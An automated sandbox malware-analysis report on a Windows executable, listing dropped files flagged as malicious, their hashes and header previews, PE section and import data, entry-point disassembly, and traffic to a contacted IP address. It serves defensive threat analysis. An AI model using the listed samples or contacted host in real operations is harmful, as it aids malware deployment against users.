                                Preview:.PNG........IHDR..............$.....PLTE.....H..K..F.....G..H..G..H..H..D..I..G..Gf.Ff.Hf.Ff.E..H..H..H..H..H........H........H..G........G....................G..H........................................................................................................?..H..G..H..G..G..H.HH.HH.GG.GG.GG.II.GG.??.GG.DD.HH.OO.GG.HH.HH.II.HH.GG.HH.HH.GG.GG.HH.GG.UU.??.GG.GG.HH.HH.GG.33...................GG.HH..G..Gf.F...................GG.HH.GG.HH.H................f.Fg.Fg.Fb.Di.Cf.Gg.Fg.Gf.Fe.G..K.KKi.Fi.K.HHg.G....5n&....tRNS...3.Df....^..wU.MwU...3UMw....f.D"....<.....o.....+..M...^......-......1V{........-.........^...M.+....o......<."D.f...........wU3...^.."..fD".3.K.X.....IDATx....jSQ...Z#x U.T<S............8.D..#..+...A.Y.l.0E...y/!.....E.....;G^,<.A.........|..z....|.A;.@..{....... ..>.c.U;.@......u...v..`..`...a..`..`..`..`..`..`..`..`..`...O<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.6.G^l.........4z.#.........=.=.h.....kw...._..~._:.[;.6..C....
                                Process:C:\Users\user\Desktop\e2664726330-76546233.05.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):28272
                                Entropy (8bit):7.711663381699835
                                Encrypted:false
                                SSDEEP:384:9MegCRh1vC6FvsdvaUv2rywX0IK+H8Ku7jVolZ7XRJsKYkGDfRRX5qSgUWCHopQX:f5F1FUdy422IK+gAZt2i0YPpQn4GMU
                                MD5:B94911A8064BFE31A4B8AD111CA126C3
                                SHA1:099A1225A3B663D9827E8DF6037160C50D3E843C
                                SHA-256:A44A201FBAE90F4E029307DDC457BF4D8557C5F036B86AA53DDDADACFF4E7C82
                                SHA-512:B21F677D5E4AB1F4C6F6CEBD2BC8F8478C349E204751989048100CF335CDFBA9E1072BB209E823422918FF3B42C87E334675CE8FE8369F351B38A4FC5CE3A1B3
                                Malicious:false
                                Preview:..(.........GG..............................................P..........{Z.z7..c_6,./]@H]<0}>_PPQ%q34.FAZz34z>5)Z75>?.225.5555555..G\.@f.z\.@f.{\.@f...\.@f...\.@f...\.@f...\.@f...\.@f...\.@f4......4444444444444444444444444dq44P.<4.g.bbbbbbbbb.b@bi`kbbXbbbpbbbbbb..bbbrbbbbcbbbbbbrbbb`bbdbcbdbcbdbcbbbbbb.bbbfbb.$cbcbbbbbfbbbbbbrbbbbbbbbrbbbbbbrbbbbbbbbbbrbbbbbbbbbbbr.bbJbbbb.bb.abbb.bb.cbbb2bb.|bbb.bb&bbb.#bb~bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb"bb.cbbbbbbbbbbbbbbbbbbbbbbbbbbL...n....6.......4..................:..r\...gr.......S.......!..............S..[u?:/N////-///.///-///.//////////////o//......"............................................................................?.........................]s/./L///.,///.///+///e//////////////o//mC...nb...............O..............A..CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
                                Process:C:\Users\user\Desktop\e2664726330-76546233.05.exe
                                File Type:PNG image data, 512 x 512, 8-bit colormap, non-interlaced
                                Category:dropped
                                Size (bytes):10681
                                Entropy (8bit):7.866148090449211
                                Encrypted:false
                                SSDEEP:192:fN3El4oBtN9pmD65VoeotpeGy/nmgVtKFbM/PvMZ5ZWtZl4EehHGXI9Fch5:fN3E7NW27oJWJ+M/8ZCDuEe2I9FS5
                                MD5:10A818386411EE834D99AE6B7B68BE71
                                SHA1:27644B42B02F00E772DCCB8D3E5C6976C4A02386
                                SHA-256:7545AC54F4BDFE8A9A271D30A233F8717CA692A6797CA775DE1B7D3EAAB1E066
                                SHA-512:BDC5F1C9A78CA677D8B7AFA2C2F0DE95337C5850F794B66D42CAE6641EF1F8D24D0F0E98D295F35E71EBE60760AD17DA1F682472D7E4F61613441119484EFB8F
                                Malicious:false
                                Preview:.PNG........IHDR..............$.....PLTE.....H..K..F.....G..H..G..H..H..D..I..G..Gf.Ff.Hf.Ff.E..H..H..H..H..H........H........H..G........G....................G..H........................................................................................................?..H..G..H..G..G..H.HH.HH.GG.GG.GG.II.GG.??.GG.DD.HH.OO.GG.HH.HH.II.HH.GG.HH.HH.GG.GG.HH.GG.UU.??.GG.GG.HH.HH.GG.33...................GG.HH..G..Gf.F...................GG.HH.GG.HH.H................f.Fg.Fg.Fb.Di.Cf.Gg.Fg.Gf.Fe.G..K.KKi.Fi.K.HHg.G....5n&....tRNS...3.Df....^..wU.MwU...3UMw....f.D"....<.....o.....+..M...^......-......1V{........-.........^...M.+....o......<."D.f...........wU3...^.."..fD".3.K.X.....IDATx....jSQ...Z#x U.T<S............8.D..#..+...A.Y.l.0E...y/!.....E.....;G^,<.A.........|..z....|.A;.@..{....... ..>.c.U;.@......u...v..`..`...a..`..`..`..`..`..`..`..`..`...O<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.6.G^l.........4z.#.........=.=.h.....kw...._..~._:.[;.6..C....
                                Process:C:\Users\user\Desktop\e2664726330-76546233.05.exe
                                File Type:PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                Category:dropped
                                Size (bytes):3889557
                                Entropy (8bit):7.999938756719969
                                Encrypted:true
                                SSDEEP:98304:6AnkiLOZS/hpXbdHpPcG59BO8NQXIeXXv5L4f2fN3yQWF+A:ZndLOZS/DtpPJRO8OHBL4f2UQI+A
                                MD5:2AB88467769B9040137C50EA6DAEF7CA
                                SHA1:6C2BB164E1E707C4A87A0EAB48F5B918897E0D95
                                SHA-256:09569EC5C5B4641DAA0D90FD5D8B1EB2474E044C526FD098BF25EE9FDEC498B8
                                SHA-512:8FD59AB3C7C18663154A9CF401DD752664DA15573D952CB5BD76841FA8FB5514C2E930A5712E45367202AB2C076E7669C0D658180E0A83E4AF712D297B5A448A
                                Malicious:false
                                Preview:.PNG........IHDR.............\r.f....pHYs............... .IDATx....n.....&E!J.%M.."..9....."...H..L.....LI:.)..K7..!.4Q...{..d.....[......Z{......<.y<9.o...w....]...q..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q......3%.F.1p..rD%.;%rD.1p.....qz.....1n.....p.....qz.....1n...0.^.I..9......c.Z....$.Q..K=.OKp=...e%.(.R.....p-tzD..9.m...+.Un...S...5..F..D......R.ys.?W.....|]....Ke......G......U..1....#^..1|..!.O.OWr.H.w.P..p.V..H.wz..mo.U....?F......k7[2.."....+...&]#..d......<...V\{P..d...8=.9..Al....Wr......Pc`......X.g..\.|i7.....O.B.g.p...]..%.^..T.w....a.u..x..zZ........V.....$.Y.6.t....?*.g.~..@.93.g.....lPn..o...7.p.J.Cq....J....3.<]...X...w..o..\.u...Jv...3e.).9q..6(..s...^.k...#..[Vr.t.47J}..M......:.....I%.Q\cPN.n...R.z;3J..c....q.].~s.J..._.d.........y....ur{:v...A.I%....)..*..t{..(.g.o...;....>..7)~{P~_.....5t{X<.x....J....J.0..YY\b.-&.?...Y7.$.X_.e.......{..Jd.3w...l......q.M...&..*...~f...[./.......w..U.^.{q.`......GVV...5.;Z.`W.-uxV...
                                Process:C:\Users\user\Desktop\e2664726330-76546233.05.exe
                                File Type:GIF image data, version 89a, 10 x 10
                                Category:dropped
                                Size (bytes):8228
                                Entropy (8bit):7.978971345776604
                                Encrypted:false
                                SSDEEP:192:eBue6hKvTlByz2GqpoPTgyXrByFCt4lXp9tyey2Q0l:eBuNhyTlBU2dp+1XrBuCgp9vU0l
                                MD5:28C7C3C066DC2BE9BF22201DA53313BD
                                SHA1:A00945239952188A89C09458F973141AD1E302C2
                                SHA-256:2007954F3ED056C0838F3AF71A87A491B42FE6CF05A21FB7F3F1CC48CA05BB3A
                                SHA-512:BBB681FCC2F515D32EC9285EEBD1E8869C55073A15C0CDB16F70870AB11DB98730CE21FDD20CC63CA902B0056A314EA0F67BB57DEB34797CEDDF28D6495B12E6
                                Malicious:false
                                Preview:GIF89a.......,...........;.;G_fx5.#DV..g..}A/...l=.2......'o...!.....e.,t..o8.^...B^x..6I*X.DC.Oa..../_...n$_.y..+jb..r...Y4/Rv.....(;....$...g..........~.IN ...-<R7....eZ..q4.....~...}....~t<......|}....x.)U3.`U..s....W..WY..w+o-[..{..l..i`.:.......L'.>...$. .a.x.2#y_(9....d,....=n...%..*.c.........dq.nfLI....!1..2...`.,...~....)w.5E 1.V...0."...cu...p........^|@.-w..+...M.(.GK.y}.N.........}.....-..e.......X...GE.|.-._..*.M.....Mc........9/..fQ.Z.....W.....s...........k?C.q.u.-...Q..."..kt..A..128.......7#...~....1.`..:C.(.C.<y.(..<..'..+.!&.....r..I.....d...W.....-.'.Ec`Nv.8).....!....?.....\..N.3..D...U.....(..#sdY..D"...p.>.W.Q...}.. ..2.A('Q\_y...|..Az..JO.B.A..Q05.)..Q..zd..V..l......S.....dS.x....z^..z...).a.....4.G..........M.,..a..U...\....G...$...Q.7...@.x...x.s..R..0.-3...).x.D..f.I..n.....}..{.p.q.%,.lF.f.Up..UM..Y..1............R.....F.._....Y..u...e^.c...f.'..U.W1g..e#J...Z.W.....w.[...........R.?.m......"@.f..V..fxI
                                Process:C:\Users\user\Desktop\e2664726330-76546233.05.exe
                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                Category:dropped
                                Size (bytes):133136
                                Entropy (8bit):6.350273548571922
                                Encrypted:false
                                SSDEEP:3072:NtmH5WKiSogv0HSCcTwk7ZaxbXq+d1ftrt+armpQowbFqD:NYZEHG0yfTPFas+dZZrL9MD
                                MD5:D3709B25AFD8AC9B63CBD4E1E1D962B9
                                SHA1:6281A108C7077B198241159C632749EEC5E0ECA8
                                SHA-256:D2537DC4944653EFCD48DE73961034CFD64FB7C8E1BA631A88BBA62CCCC11948
                                SHA-512:625F46D37BCA0F2505F46D64E7706C27D6448B213FE8D675AD6DF1D994A87E9CEECD7FB0DEFF35FDDD87805074E3920444700F70B943FAB819770D66D9E6B7AB
                                Malicious:true
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 0%
                                Joe Sandbox View:
                                • Filename: 23567791246-764698008.02.exe, Detection: malicious, Browse
                                • Filename: 287438657364-7643738421.08.exe, Detection: malicious, Browse
                                • Filename: 287438657364-7643738421.08.exe, Detection: malicious, Browse
                                • Filename: 2749837485743-7684385786.05.exe, Detection: malicious, Browse
                                • Filename: 2749837485743-7684385786.05.exe, Detection: malicious, Browse
                                • Filename: 2b687482300.6345827638.08.exe, Detection: malicious, Browse
                                • Filename: 2b687482300.6345827638.08.exe, Detection: malicious, Browse
                                • Filename: 45631.exe, Detection: malicious, Browse
                                • Filename: 45631.exe, Detection: malicious, Browse
                                • Filename: 0000000000000000.exe, Detection: malicious, Browse
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s.E.7w+.7w+.7w+...V.?w+...E..w+...F.Qw+...P.5w+.>...>w+.7w*..w+...Y.>w+...W.6w+...S.6w+.Rich7w+.........PE..d...Kd.]..........#......*..........P].........@............................................................................................,...x...............,........H...........D...............................................@..@............................text...*).......*.................. ..`.rdata..x_...@...`..................@..@.data....:..........................@....pdata..,...........................@..@.rsrc...............................@..@................................................................................................................................................................................................................................................................................................................
                                Process:C:\Users\user\Desktop\e2664726330-76546233.05.exe
                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                Category:dropped
                                Size (bytes):122880
                                Entropy (8bit):6.002028851858384
                                Encrypted:false
                                SSDEEP:1536:Jd4E7qItA4nbQ0R3rh4Q8/0fp0uQ4S8S7YDLbnTPtrTzvesW7dj9dl4Cp52Fm:Jf7qG3Gyp0p4ZmGLbTPJT7y7aCp5gm
                                MD5:9B65176E2DF59AE11F0603A00B40D533
                                SHA1:8A10C843493A792BAEC4836B5ADB480D17BDE210
                                SHA-256:F747542E3B1761FDA57729917822C94CF1FB614D673AF7409971E5C2A63FA1AB
                                SHA-512:9E66D5CC218AC4103D889C3BEA2AF99B06AE9D42E2C8F164CCEF2C93E717038C0B4B28CCA2B2C8409A6C6EF73328FBA3A528BB86C1906190EBAED3720FB76EFD
                                Malicious:true
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......d... .E .E .Ek..D%.Ek..D..Ek..D*.E0N.D).E0N.D..E0N.D..Ek..D#.E .EB.EhO.D!.EhO.D!.EhOHE!.E . E!.EhO.D!.ERich .E........PE..d....w.g.........." ...).....................................................0............`.........................................`...........(.......H.................... ..x... ...8...............................@............ ...............................text............................... ..`.rdata....... ......................@..@.data...0...........................@....pdata..............................@..@.rsrc...H...........................@..@.reloc..x.... ......................@..B........................................................................................................................................................................................................................................
                                Process:C:\Users\user\Desktop\e2664726330-76546233.05.exe
                                File Type:PE32+ executable (native) x86-64, for MS Windows
                                Category:dropped
                                Size (bytes):28272
                                Entropy (8bit):6.229308092556892
                                Encrypted:false
                                SSDEEP:384:m3YUY30d1Kgf4AtcTmwZ/22a97C5ohYh3IB96Oys2+l0skiM0HMFrba8no0ceD/k:mOUkgfdZ9pRyv+uPzCMHo3q4tDghi
                                MD5:E7B331C5F4578D3BECE4FE4BD08A1D51
                                SHA1:9D6590D1EF9AB9083B938B3408EF002FEA5E7CEC
                                SHA-256:EEA8735E4FA7F2307815AD80CEF0E11A2C235E67AF4F4B05944CDC642BEA39E0
                                SHA-512:EA9D3705F56414AEB8FA1B9AA9ABE3A1657425EC21ED373ECBCF40501B749D1060FB857193C1D2C7DEF843D8A81D7630E9287F96A169C28A59817AA095DCF1BB
                                Malicious:true
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ri...:...:...:...:...:...:...:...:...:...:...:...:...:...:...:...:...:Rich...:........................PE..d....S.V.........."......:..........l...............................................~F..........................................................(............`.......P..p.......D....A...............................................@...............................text....,.......................... ..h.rdata.......@.......2..............@..H.data........P.......:..............@....pdata.......`.......<..............@..HPAGE....l....p.......>.............. ..`INIT.................@.............. ....rsrc................J..............@..B.reloc...............N..............@..B........................................................................................................................................................................................
                                File type:PE32+ executable (GUI) x86-64, for MS Windows
                                Entropy (8bit):0.10749477527827608
                                TrID:
                                • Win64 Executable GUI (202006/5) 92.65%
                                • Win64 Executable (generic) (12005/4) 5.51%
                                • Generic Win/DOS Executable (2004/3) 0.92%
                                • DOS Executable Generic (2002/1) 0.92%
                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                File name:e2664726330-76546233.05.exe
                                File size:30'941'696 bytes
                                MD5:b870e18fa5a2c9198e95c0d3b3b7dee3
                                SHA1:0fd94ac9b9cf07eef7db99096905c2e5d237d43c
                                SHA256:1c0a56b789c7f194c4f9b079e1192d600f48a832c748862415347963299ac075
                                SHA512:a61c8a7e1fabea0da930023fdeeec5d8b5e4cc48cfc9033c31e73ae4a79a591247a59a1fad8f992a567b18d58f6f281abfe43d728e75b1c453318f91cfd72d5d
                                SSDEEP:3072:75Z8yoqC02vN/vqBO3avZHu6cZB45OSS9aHDgtP7NoNy2T9sDGe5dJT:VZ8t902V/SBXvZH5cZPeDgOxsv
                                TLSH:68679E0BB3A520E5E5B7C334C8A15647E77274711721ABAF0694827AEF237D08D3EB61
                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........e...6...6...6...7...6...7...6...7...6#..7...6#..7...6#..7...6...7...6...6...6...7...6..)6...6..A6...6...7...6Rich...6.......
                                Icon Hash:0f096d6869693b8e
                                Entrypoint:0x140004ca8
                                Entrypoint Section:.text
                                Digitally signed:false
                                Imagebase:0x140000000
                                Subsystem:windows gui
                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                DLL Characteristics:HIGH_ENTROPY_VA, TERMINAL_SERVER_AWARE
                                Time Stamp:0xC9C0AD62 [Mon Apr 5 11:28:34 2077 UTC]
                                TLS Callbacks:
                                CLR (.Net) Version:
                                OS Version Major:6
                                OS Version Minor:0
                                File Version Major:6
                                File Version Minor:0
                                Subsystem Version Major:6
                                Subsystem Version Minor:0
                                Import Hash:22b3edef3d8a3e31a6813b5e725b555f
                                Instruction
                                dec eax
                                sub esp, 28h
                                call 00007F5944836090h
                                dec eax
                                add esp, 28h
                                jmp 00007F5944832092h
                                int3
                                int3
                                inc eax
                                push ebx
                                dec eax
                                sub esp, 20h
                                dec eax
                                mov ebx, ecx
                                jmp 00007F5944835C81h
                                dec eax
                                mov ecx, ebx
                                call 00007F594483CD6Eh
                                test eax, eax
                                je 00007F5944835C85h
                                dec eax
                                mov ecx, ebx
                                call 00007F594483CDDAh
                                dec eax
                                test eax, eax
                                je 00007F5944835C59h
                                dec eax
                                add esp, 20h
                                pop ebx
                                ret
                                dec eax
                                cmp ebx, FFFFFFFFh
                                je 00007F5944835C78h
                                call 00007F5944836574h
                                int3
                                call 00007F594483658Eh
                                int3
                                jmp 00007F594483CDC0h
                                int3
                                int3
                                int3
                                inc eax
                                push ebx
                                dec eax
                                sub esp, 20h
                                dec eax
                                mov ebx, ecx
                                xor ecx, ecx
                                call dword ptr [000133C7h]
                                dec eax
                                mov ecx, ebx
                                call dword ptr [000133B6h]
                                call dword ptr [000133C0h]
                                dec eax
                                mov ecx, eax
                                mov edx, C0000409h
                                dec eax
                                add esp, 20h
                                pop ebx
                                dec eax
                                jmp dword ptr [000133B4h]
                                dec eax
                                mov dword ptr [esp+08h], ecx
                                dec eax
                                sub esp, 38h
                                mov ecx, 00000017h
                                call dword ptr [000133A8h]
                                test eax, eax
                                je 00007F5944835C79h
                                mov ecx, 00000002h
                                int 29h
                                dec eax
                                lea ecx, dword ptr [0001EE26h]
                                call 00007F5944835D1Eh
                                dec eax
                                mov eax, dword ptr [esp+38h]
                                dec eax
                                mov dword ptr [0001EF0Dh], eax
                                dec eax
                                lea eax, dword ptr [esp+38h]
                                NameVirtual AddressVirtual Size Is in Section
                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IMPORT0x2246c0x78.rdata
                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x1d810000x6868.rsrc
                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x1d7e0000x1218.pdata
                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x1d880000x69c.reloc
                                IMAGE_DIRECTORY_ENTRY_DEBUG0x20a300x70.rdata
                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x208f00x140.rdata
                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IAT0x180000x2f0.rdata
                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                .text0x10000x160a00x162001818fb65bfb140e25ce9d0d4a10407cfFalse0.5711180261299436data6.4734700435636165IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                .rdata0x180000xae6e0xb0009855dd434418b7d034ac49dc4b034a02False0.4580965909090909data4.92711552978267IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                .data0x230000x1d5ada00x1d58400b7e5eb7c3325266cde510ddfb30525f1unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .pdata0x1d7e0000x12180x1400bb2c87bdb35d73ad7420cda120611cb7False0.444140625data4.770636792935485IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                _RDATA0x1d800000x15c0x2002851ab45dfabaf770e5631ccfadc5b6eFalse0.384765625data2.826220759254903IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                .rsrc0x1d810000x68680x6a00974d7ff6bad8cbd014543fead7caf2f7False0.5854952830188679data7.2184953341386855IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                .reloc0x1d880000x69c0x80047a276ddad56d8af200ed20dceb542e5False0.50146484375data4.950124278166956IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                RT_ICON0x1d815c00x7ccPNG image data, 16 x 16, 8-bit/color RGBA, non-interlacedEnglishUnited States0.6362725450901804
                                RT_ICON0x1d81d900x98fPNG image data, 24 x 24, 8-bit/color RGBA, non-interlacedEnglishUnited States0.7159787494891704
                                RT_ICON0x1d827200x9e7PNG image data, 32 x 32, 8-bit/color RGBA, non-interlacedEnglishUnited States0.7317554240631163
                                RT_ICON0x1d831080xbddPNG image data, 40 x 40, 8-bit/color RGBA, non-interlacedEnglishUnited States0.7728021073427724
                                RT_ICON0x1d83ce80xcacPNG image data, 48 x 48, 8-bit/color RGBA, non-interlacedEnglishUnited States0.7919235511713933
                                RT_ICON0x1d849980xdcbPNG image data, 64 x 64, 8-bit/color RGBA, non-interlacedEnglishUnited States0.8088360237892949
                                RT_ICON0x1d857680x1b13PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.8928004616938393
                                RT_GROUP_ICON0x1d872800x68dataEnglishUnited States0.7692307692307693
                                RT_VERSION0x1d812500x36cdataEnglishUnited States0.4623287671232877
                                RT_MANIFEST0x1d872e80x580XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (1348), with CRLF line terminatorsEnglishUnited States0.4403409090909091
                                DLLImport
                                KERNEL32.dllGetExitCodeProcess, CreateProcessW, GetModuleFileNameW, LoadResource, LockResource, WaitForSingleObject, FindResourceW, LoadLibraryW, CreateFileW, GetConsoleMode, GetLastError, CloseHandle, SizeofResource, GetFileAttributesW, GetConsoleOutputCP, FlushFileBuffers, HeapReAlloc, HeapSize, SetFilePointerEx, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, RtlUnwindEx, RtlPcToFileHeader, RaiseException, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, GetProcAddress, LoadLibraryExW, EncodePointer, GetStdHandle, WriteFile, ExitProcess, GetModuleHandleExW, HeapFree, HeapAlloc, GetFileType, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, MultiByteToWideChar, WideCharToMultiByte, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetStdHandle, GetStringTypeW, FlsAlloc, FlsGetValue, FlsSetValue, FlsFree, LCMapStringW, GetProcessHeap, VirtualAlloc
                                USER32.dllwsprintfW, MessageBoxW
                                ADVAPI32.dllRegOpenKeyExW, RegCloseKey, RegQueryValueExW
                                SHELL32.dllShellExecuteExW
                                SHLWAPI.dllPathCombineW, PathRemoveFileSpecW, PathCanonicalizeW
                                Language of compilation systemCountry where language is spokenMap
                                EnglishUnited States
                                TimestampSource PortDest PortSource IPDest IP
                                Jan 8, 2025 10:11:20.856966972 CET49971443192.168.2.659.110.190.44
                                Jan 8, 2025 10:11:20.857002020 CET4434997159.110.190.44192.168.2.6
                                Jan 8, 2025 10:11:20.857075930 CET49971443192.168.2.659.110.190.44
                                Jan 8, 2025 10:11:20.867063046 CET49971443192.168.2.659.110.190.44
                                Jan 8, 2025 10:11:20.867075920 CET4434997159.110.190.44192.168.2.6
                                Jan 8, 2025 10:11:22.068562031 CET4434997159.110.190.44192.168.2.6
                                Jan 8, 2025 10:11:22.068633080 CET49971443192.168.2.659.110.190.44
                                Jan 8, 2025 10:11:22.069219112 CET4434997159.110.190.44192.168.2.6
                                Jan 8, 2025 10:11:22.069272041 CET49971443192.168.2.659.110.190.44
                                Jan 8, 2025 10:11:22.117419958 CET49971443192.168.2.659.110.190.44
                                Jan 8, 2025 10:11:22.117435932 CET4434997159.110.190.44192.168.2.6
                                Jan 8, 2025 10:11:22.117649078 CET4434997159.110.190.44192.168.2.6
                                Jan 8, 2025 10:11:22.118936062 CET49971443192.168.2.659.110.190.44
                                Jan 8, 2025 10:11:22.120553017 CET49971443192.168.2.659.110.190.44
                                Jan 8, 2025 10:11:22.163327932 CET4434997159.110.190.44192.168.2.6
                                Jan 8, 2025 10:11:22.439701080 CET4434997159.110.190.44192.168.2.6
                                Jan 8, 2025 10:11:22.439815044 CET4434997159.110.190.44192.168.2.6
                                Jan 8, 2025 10:11:22.439842939 CET49971443192.168.2.659.110.190.44
                                Jan 8, 2025 10:11:22.439930916 CET49971443192.168.2.659.110.190.44
                                Jan 8, 2025 10:11:22.453093052 CET49971443192.168.2.659.110.190.44
                                Jan 8, 2025 10:11:22.453113079 CET4434997159.110.190.44192.168.2.6
                                Jan 8, 2025 10:11:22.552186966 CET49972443192.168.2.659.110.190.44
                                Jan 8, 2025 10:11:22.552248001 CET4434997259.110.190.44192.168.2.6
                                Jan 8, 2025 10:11:22.552330971 CET49972443192.168.2.659.110.190.44
                                Jan 8, 2025 10:11:22.552520990 CET49972443192.168.2.659.110.190.44
                                Jan 8, 2025 10:11:22.552536964 CET4434997259.110.190.44192.168.2.6
                                Jan 8, 2025 10:11:23.792395115 CET4434997259.110.190.44192.168.2.6
                                Jan 8, 2025 10:11:23.792567015 CET49972443192.168.2.659.110.190.44
                                Jan 8, 2025 10:11:23.793266058 CET49972443192.168.2.659.110.190.44
                                Jan 8, 2025 10:11:23.793276072 CET4434997259.110.190.44192.168.2.6
                                Jan 8, 2025 10:11:23.793462992 CET49972443192.168.2.659.110.190.44
                                Jan 8, 2025 10:11:23.793467045 CET4434997259.110.190.44192.168.2.6
                                Jan 8, 2025 10:11:24.145884991 CET4434997259.110.190.44192.168.2.6
                                Jan 8, 2025 10:11:24.145911932 CET4434997259.110.190.44192.168.2.6
                                Jan 8, 2025 10:11:24.146003962 CET49972443192.168.2.659.110.190.44
                                Jan 8, 2025 10:11:24.146035910 CET4434997259.110.190.44192.168.2.6
                                Jan 8, 2025 10:11:24.146087885 CET49972443192.168.2.659.110.190.44
                                Jan 8, 2025 10:11:24.146542072 CET4434997259.110.190.44192.168.2.6
                                Jan 8, 2025 10:11:24.146600008 CET49972443192.168.2.659.110.190.44
                                Jan 8, 2025 10:11:24.147599936 CET4434997259.110.190.44192.168.2.6
                                Jan 8, 2025 10:11:24.147661924 CET49972443192.168.2.659.110.190.44
                                Jan 8, 2025 10:11:24.151575089 CET4434997259.110.190.44192.168.2.6
                                Jan 8, 2025 10:11:24.151634932 CET49972443192.168.2.659.110.190.44
                                Jan 8, 2025 10:11:24.238002062 CET4434997259.110.190.44192.168.2.6
                                Jan 8, 2025 10:11:24.238099098 CET49972443192.168.2.659.110.190.44
                                Jan 8, 2025 10:11:24.238445044 CET4434997259.110.190.44192.168.2.6
                                Jan 8, 2025 10:11:24.238502979 CET49972443192.168.2.659.110.190.44
                                Jan 8, 2025 10:11:24.239264965 CET4434997259.110.190.44192.168.2.6
                                Jan 8, 2025 10:11:24.239326954 CET49972443192.168.2.659.110.190.44
                                Jan 8, 2025 10:11:24.239752054 CET4434997259.110.190.44192.168.2.6
                                Jan 8, 2025 10:11:24.239808083 CET49972443192.168.2.659.110.190.44
                                Jan 8, 2025 10:11:24.240788937 CET4434997259.110.190.44192.168.2.6
                                Jan 8, 2025 10:11:24.240853071 CET49972443192.168.2.659.110.190.44
                                Jan 8, 2025 10:11:24.241234064 CET4434997259.110.190.44192.168.2.6
                                Jan 8, 2025 10:11:24.241290092 CET49972443192.168.2.659.110.190.44
                                Jan 8, 2025 10:11:24.242191076 CET4434997259.110.190.44192.168.2.6
                                Jan 8, 2025 10:11:24.242244959 CET49972443192.168.2.659.110.190.44
                                Jan 8, 2025 10:11:24.242846966 CET4434997259.110.190.44192.168.2.6
                                Jan 8, 2025 10:11:24.242901087 CET49972443192.168.2.659.110.190.44
                                Jan 8, 2025 10:11:24.244000912 CET4434997259.110.190.44192.168.2.6
                                Jan 8, 2025 10:11:24.244057894 CET49972443192.168.2.659.110.190.44
                                Jan 8, 2025 10:11:24.330140114 CET4434997259.110.190.44192.168.2.6
                                Jan 8, 2025 10:11:24.330321074 CET49972443192.168.2.659.110.190.44
                                Jan 8, 2025 10:11:24.330570936 CET4434997259.110.190.44192.168.2.6
                                Jan 8, 2025 10:11:24.330629110 CET49972443192.168.2.659.110.190.44
                                Jan 8, 2025 10:11:24.331005096 CET4434997259.110.190.44192.168.2.6
                                Jan 8, 2025 10:11:24.331063032 CET49972443192.168.2.659.110.190.44
                                Jan 8, 2025 10:11:24.331820011 CET4434997259.110.190.44192.168.2.6
